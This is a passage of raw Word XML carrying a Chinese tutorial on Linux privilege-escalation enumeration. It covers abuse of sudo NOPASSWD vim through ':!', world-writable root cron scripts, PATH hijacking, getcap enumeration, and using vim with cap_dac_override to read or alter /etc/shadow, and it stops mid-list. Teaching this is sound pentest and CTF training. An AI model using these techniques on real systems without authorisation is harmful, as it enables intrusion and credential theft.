          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">User www-data may run the following commands on target:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (root) NOPASSWD: /usr/bin/vim /var/www/html/config.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这一规则允许</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份、无需密码执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编辑指定的配置文件。攻击者可以利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">:!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令执行任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令，从而提权。更危险的配置是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——这意味着当前用户实质上已经是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root，只是多绕了一层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">而已。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任务枚举</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的定时任务调度系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①，广泛用于自动化维护任务（日志轮转、备份、系统更新等）。每个用户都可以有自己的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab（通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab -e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编辑），存储在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/spool/cron/crontabs/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录下；系统的全局</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">任务则分布在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.hourly/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.daily/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.weekly/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.monthly/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/cron.d/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任务以属主身份运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——如果属主是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root，则该任务以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权漏洞产生于以下场景：一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属主的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">任务引用了某个脚本或程序，而该脚本或程序对当前低权限用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（writable）。攻击者只需要修改被引用的脚本，插入恶意命令，等待</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在下一个触发器时刻执行该脚本，恶意命令即以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举思路：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件内容（该文件通常对所有用户可读）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">列出各</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目录下的脚本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /etc/cron.hourly/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查这些脚本的写入权限：如果一个定时执行的脚本其属主和组分别是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root:root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，但权限为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rwxrwxrwx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">777），则任何用户都可以修改它（②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此类配置错误在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机中常见，在生产系统中极少但不排除存在）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1158"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab -l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以查看当前用户的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab；某些配置下系统可能允许低权限用户通过环境变量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">劫持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cron </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">任务的命令解析路径。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">枚举</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities（能力）是内核</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本引入的更细粒度的权限划分机制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①。传统的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限模型中，只有“超级用户”（uid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0）和“普通用户”两档，root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拥有全部能力，普通用户一无所有。Capabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程的完整特权拆分成多个独立的“能力”单元（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_NET_RAW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">允许使用原始套接字、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SYS_PTRACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">允许追踪任意进程、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_DAC_READ_SEARCH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">允许绕过文件的读权限检查等），使得一个进程可以只被授予其所需的最小能力集，即使它不是以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，错误的能力授予同样可能被利用。例如，给一个二进制文件授予</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SETUID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">能力，允许它任意修改自己的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UID——这等价于允许它变成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SYS_ADMIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则是众所周知的“几乎相当于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root”的危险能力，因为它涵盖了大量的管理操作（挂载文件系统、配置网络命名空间等）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">枚举命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此命令递归搜索整个文件系统，列出所有被设置了扩展能力的文件。预期输出类似（具体值因系统而异</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = cap_net_raw+ep</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/vim.basic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = cap_dac_override+ep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被授予了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_dac_override</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（绕过文件权限检查），攻击者可以利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取或修改本不可访问的系统文件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），从而实现信息窃取或添加新用户等提权效果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">其他关键枚举点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">除上述四大类外，完整的提权枚举还应覆盖以下维度（③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简化示意，具体输出因靶机而异）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">可写的敏感文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/sudoers</w:t>
      </w:r>
      <w:r>
